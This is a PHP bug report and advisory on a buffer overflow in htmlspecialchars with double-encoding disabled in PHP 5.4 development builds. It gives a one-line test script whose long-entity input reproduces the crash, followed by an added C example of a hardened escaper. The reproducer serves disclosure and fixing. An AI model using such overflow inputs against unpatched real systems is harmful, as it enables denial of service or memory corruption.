
PHP 5.4 Buffer Overflow

Posted on 04 February 2012

From: cataphract
Operating system: Any
PHP version: 5.4SVN-2012-02-03 (SVN)
Package: Reproducible crash
Bug Type: Bug
Bug description: Buffer overflow on htmlspecialchars/entities with $double=false

Description:
------------
Long entities can cause a buffer overflow because the loop only guarantees 40 bytes available at the beginning.

Test script:
---------------
<?php
echo htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;', ENT_QUOTES, 'UTF-8', false), " ";
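
The failure mode the report describes, as an added C example (not PHP's source and not part of the original report): an escaper that passes existing entities through unchanged has to size each write by the entity's length, because a fixed 40-byte reservation is too small for a long entity. `entity_len`, `escape_no_double` and `short_by` are hypothetical names, and the entity scanner is a simplified assumption.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HEADROOM 40 /* per-iteration guarantee named in the report */
/* Length of an "&...;" token at s, or 0. Simplified scanner (assumption). */
static size_t entity_len(const char *s, size_t n) {
    size_t i = 1;
    if (n < 3 || s[0] != '&') return 0;
    while (i < n && (s[i] == '#' || (s[i] >= '0' && s[i] <= '9') ||
           ((s[i] | 32) >= 'a' && (s[i] | 32) <= 'z'))) i++;
    return (i > 1 && i < n && s[i] == ';') ? i + 1 : 0;
}

/* Escape '"' and '&', passing existing entities through unchanged (the
   double_encode=false behaviour). *short_by receives how many bytes a fixed
   HEADROOM reservation alone would have been short for the longest write. */
char *escape_no_double(const char *in, size_t *short_by) {
    size_t n = strlen(in), cap = HEADROOM + 1, len = 0, i = 0;
    char *out = malloc(cap);
    *short_by = 0;
    while (out && i < n) {
        size_t e = entity_len(in + i, n - i), plen = e ? e : 1;
        const char *piece = in + i;
        if (!e && in[i] == '"') { piece = "&quot;"; plen = 6; }
        else if (!e && in[i] == '&') { piece = "&amp;"; plen = 5; }
        if (plen > HEADROOM && plen - HEADROOM > *short_by)
            *short_by = plen - HEADROOM;
        /* Hardened: reserve what this write needs, not a constant. */
        if (len + plen + 1 > cap) {
            cap = (len + plen + 1) * 2;
            char *t = realloc(out, cap);
            if (!t) { free(out); return NULL; }
            out = t;
        }
        memcpy(out + len, piece, plen);
        len += plen;
        i += e ? e : 1;
    }
    if (out) out[len] = '\0';
    return out;
}

int main(void) {
    size_t short_by;  /* constructed sample: quotes, one short entity, bare & */
    char *r = escape_no_double("\"x\" &#x05; &", &short_by);
    if (r) printf("%s (short by %zu)\n", r, short_by);
    free(r);
    return 0;
}
```

A non-zero `short_by` marks input for which a constant reservation would have been exceeded by a pass-through copy.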

 
